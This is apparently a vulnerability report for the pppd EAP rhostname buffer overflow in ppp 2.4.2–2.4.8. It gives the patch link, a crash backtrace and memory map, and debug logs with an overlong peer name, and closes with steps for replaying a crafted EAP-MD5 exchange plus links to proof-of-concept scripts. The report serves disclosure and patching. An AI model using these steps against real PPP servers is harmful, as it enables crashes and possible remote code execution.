eap.c in pppd in ppp 2.4.2 through 2.4.8 has an rhostname buffer overflow in the eap_request and eap_response functions.
If you manage to get "EAP: unauthenticated peer name" long enough, seems like my client limits it to 255, you can do Buffer Overflow.
You still have to beat the Stack Canaries, so crash is the most possible.
Ubuntu 16.04.6 LTS and possibly other will have these protecions:
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH No Symbols Yes 12 22 /usr/sbin/pppd
Affects ppp and pppoe (PPP over Ethernet)
Source (patch):
https://github.com/paulusmack/ppp/commit/8d7970b8f3db727fe798b65f3377fe6787575426
*** buffer overflow detected ***: pppd terminated
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fea131337e5]
/lib/x86_64-linux-gnu/libc.so.6(__fortify_fail+0x5c)[0x7fea131d515c]
/lib/x86_64-linux-gnu/libc.so.6(+0x117160)[0x7fea131d3160]
pppd[0x42a858]
pppd(main+0x95f)[0x40981f]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fea130dc830]
pppd(_start+0x29)[0x409db9]
======= Memory map: ========
00400000-00448000 r-xp 00000000 fd:01 11540966 /usr/sbin/pppd
00648000-00649000 r--p 00048000 fd:01 11540966 /usr/sbin/pppd
00649000-0064f000 rw-p 00049000 fd:01 11540966 /usr/sbin/pppd
0064f000-0069b000 rw-p 00000000 00:00 0
01c7b000-01c9c000 rw-p 00000000 00:00 0 [heap]
7fea12666000-7fea1267c000 r-xp 00000000 fd:01 13898255 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1267c000-7fea1287b000 ---p 00016000 fd:01 13898255 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1287b000-7fea1287c000 rw-p 00015000 fd:01 13898255 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fea1287c000-7fea12887000 r-xp 00000000 fd:01 13908799 /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12887000-7fea12a86000 ---p 0000b000 fd:01 13908799 /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a86000-7fea12a87000 r--p 0000a000 fd:01 13908799 /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a87000-7fea12a88000 rw-p 0000b000 fd:01 13908799 /lib/x86_64-linux-gnu/libnss_files-2.23.so
7fea12a88000-7fea12a8e000 rw-p 00000000 00:00 0
7fea12a8e000-7fea12a99000 r-xp 00000000 fd:01 13908792 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12a99000-7fea12c98000 ---p 0000b000 fd:01 13908792 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c98000-7fea12c99000 r--p 0000a000 fd:01 13908792 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c99000-7fea12c9a000 rw-p 0000b000 fd:01 13908792 /lib/x86_64-linux-gnu/libnss_nis-2.23.so
7fea12c9a000-7fea12cb0000 r-xp 00000000 fd:01 13908797 /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12cb0000-7fea12eaf000 ---p 00016000 fd:01 13908797 /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eaf000-7fea12eb0000 r--p 00015000 fd:01 13908797 /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eb0000-7fea12eb1000 rw-p 00016000 fd:01 13908797 /lib/x86_64-linux-gnu/libnsl-2.23.so
7fea12eb1000-7fea12eb3000 rw-p 00000000 00:00 0
7fea12eb3000-7fea12ebb000 r-xp 00000000 fd:01 13908803 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea12ebb000-7fea130ba000 ---p 00008000 fd:01 13908803 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130ba000-7fea130bb000 r--p 00007000 fd:01 13908803 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130bb000-7fea130bc000 rw-p 00008000 fd:01 13908803 /lib/x86_64-linux-gnu/libnss_compat-2.23.so
7fea130bc000-7fea1327c000 r-xp 00000000 fd:01 13908802 /lib/x86_64-linux-gnu/libc-2.23.so
7fea1327c000-7fea1347c000 ---p 001c0000 fd:01 13908802 /lib/x86_64-linux-gnu/libc-2.23.so
7fea1347c000-7fea13480000 r--p 001c0000 fd:01 13908802 /lib/x86_64-linux-gnu/libc-2.23.so
7fea13480000-7fea13482000 rw-p 001c4000 fd:01 13908802 /lib/x86_64-linux-gnu/libc-2.23.so
7fea13482000-7fea13486000 rw-p 00000000 00:00 0
7fea13486000-7fea13489000 r-xp 00000000 fd:01 13908787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13489000-7fea13688000 ---p 00003000 fd:01 13908787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13688000-7fea13689000 r--p 00002000 fd:01 13908787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fea13689000-7fea1368a000 rw-p 00003000 fd:01 13908787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fea1368a000-7fea1368c000 r-xp 00000000 fd:01 13908804 /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1368c000-7fea1388b000 ---p 00002000 fd:01 13908804 /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388b000-7fea1388c000 r--p 00001000 fd:01 13908804 /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388c000-7fea1388d000 rw-p 00002000 fd:01 13908804 /lib/x86_64-linux-gnu/libutil-2.23.so
7fea1388d000-7fea13896000 r-xp 00000000 fd:01 13908796 /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13896000-7fea13a95000 ---p 00009000 fd:01 13908796 /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a95000-7fea13a96000 r--p 00008000 fd:01 13908796 /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a96000-7fea13a97000 rw-p 00009000 fd:01 13908796 /lib/x86_64-linux-gnu/libcrypt-2.23.so
7fea13a97000-7fea13ac5000 rw-p 00000000 00:00 0
7fea13ac5000-7fea13aeb000 r-xp 00000000 fd:01 13908788 /lib/x86_64-linux-gnu/ld-2.23.so
7fea13cb5000-7fea13cba000 rw-p 00000000 00:00 0
7fea13ce5000-7fea13ce6000 rw-p 00000000 00:00 0
7fea13ce6000-7fea13cea000 rw-s 00000000 00:17 983 /run/pppd2.tdb
7fea13cea000-7fea13ceb000 r--p 00025000 fd:01 13908788 /lib/x86_64-linux-gnu/ld-2.23.so
7fea13ceb000-7fea13cec000 rw-p 00026000 fd:01 13908788 /lib/x86_64-linux-gnu/ld-2.23.so
7fea13cec000-7fea13ced000 rw-p 00000000 00:00 0
7ffc7c941000-7ffc7c962000 rw-p 00000000 00:00 0 [stack]
7ffc7c9b3000-7ffc7c9b6000 r--p 00000000 00:00 0 [vvar]
7ffc7c9b6000-7ffc7c9b8000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
From the debug logs:
using channel 447
Using interface ppp0
Connect: ppp0 <--> /dev/pts/20
sent [LCP ConfReq id=0x1 <mru 1492> <auth eap> <magic 0x2906ea8c>]
rcvd [LCP ConfAck id=0x1 <mru 1492> <auth eap> <magic 0x2906ea8c>]
rcvd [LCP ConfReq id=0x1 <mru 1492> <magic 0xc17bf331>]
sent [LCP ConfAck id=0x1 <mru 1492> <magic 0xc17bf331>]
sent [LCP EchoReq id=0x0 magic=0x2906ea8c]
sent [EAP Request id=0x8a Identity <Message "Name">]
rcvd [LCP EchoReq id=0x0 magic=0xc17bf331]
sent [LCP EchoRep id=0x0 magic=0x2906ea8c]
rcvd [LCP EchoRep id=0x0 magic=0xc17bf331]
rcvd [EAP Response id=0x8a Identity <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]
EAP: unauthenticated peer name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
sent [EAP Request id=0x8b MD5-Challenge <Value da 96 c9 38 6f d1 fc 22 81 6b a7 af 4a 9f eb 26 5e 8b 6d bb> <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]
rcvd [EAP Response id=0x8b MD5-Challenge <Value 7e 77 70 2d 93 ea b2 ff ef 28 a7 ea b7 2f c7 93> <Name "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA">]
You can work with Wireshark to capture the frame and for example Python to reply it.
You should set the EAP Request Identity Type to some long/big value, than perform EAP-MD5 challenge.
Attached is a sample EAP-MD5 Challenge (You need to adjust expected ID) eap-md5.py.
Poc from WinMin: https://github.com/WinMin/CVE-2020-8597/blob/master/PoC.py